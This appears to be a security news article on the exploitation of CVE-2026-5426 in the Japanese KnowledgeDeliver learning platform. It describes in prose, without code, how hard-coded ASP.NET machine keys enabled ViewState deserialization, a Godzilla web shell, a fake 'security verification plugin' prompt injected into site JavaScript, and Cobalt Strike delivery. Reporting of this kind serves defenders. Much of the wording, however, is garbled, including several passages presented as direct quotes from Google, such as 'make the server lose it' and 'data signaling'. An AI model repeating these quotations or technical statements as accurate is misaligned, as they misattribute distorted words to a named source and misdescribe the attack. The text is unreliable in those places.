A now-patched high-severity security flaw affecting Digital Knowledge KnowledgeDeliver, a popular Learning Management System (LMS) in Japan, was used as a zero-day to deliver the Godzilla web shell and ultimately facilitate the deployment of the Cobalt Strike Beacon.
Vulnerability, followed by CVE-2026-5426 (CVSS score: 7.5), stems from the use of hard-coded ASP.NET machine keys, leading to unauthorized remote code execution via ViewState de-serialization attacks. Exploitation of publicly exposed ASP.NET machine keys by malicious actors was first documented by Microsoft in February 2025.
“An unknown malicious actor used this access to inject malicious code into the LMS site, with the aim of infecting users visiting the site,” said Google Mandiant and the Google Threat Intelligence Group (GTIG).
A security flaw affected the use of Digital Knowledge KnowledgeDeliver before February 24, 2026. It is important to note that similar vulnerabilities in Sitecore Experience Manager (XM) and Gladinet CenterStack and TrioFox were also exploited by threat actors.
The problem is based on the fact that the KnowledgeDeliver installation relies on a default web.config file provided by the vendor that contains hard-coded machine key values used by the ASP.NET framework for data signaling, including ViewState loading.
As a result, a threat actor who is able to obtain keys from a single exploit can help them compromise other KnowledgeDeliver cyber-facing instances.
“ASP.NET ViewState persists the page state across all background objects,” says Google. “When the machineKey is known, a threat actor can execute a malicious ViewState payload. By sending this payload in an HTTP request (with the __VIEWSTATE parameter), a threat actor can make the server lose it.”
In the observed activity related to CVE-2026-5426, attackers were found using the Godzilla (aka BLUEBEAM) web shell, giving them the ability to execute commands or download additional payloads.
Among the instructions issued were instructions to increase its control over the web server’s file system by giving “Everyone” full access to the web application’s directory. Next, the threat actor tampered with the app’s JavaScript file to insert code that displayed a fake security warning, urging users to install a “security verification plugin.”
Correspondingly, the unauthorized modification made it possible to secretly upload a malicious script hosted on a domain controlled by the attacker. The script, in turn, convinced users to download a fake installer, eventually infecting machines with Cobalt Strike Beacon.
“The payload was encrypted using a key that used the name of the vulnerable organization, indicating that the threat actor prepared this payload specifically for the target organization,” Google said.
“The KnowledgeDeliver exploit highlights the serious risks of using shared secrets in deployment models. A single leaked key can compromise an entire ecosystem of installations. By using unique secrets and strong endpoint monitoring, organizations can protect themselves from this dumping attack.”
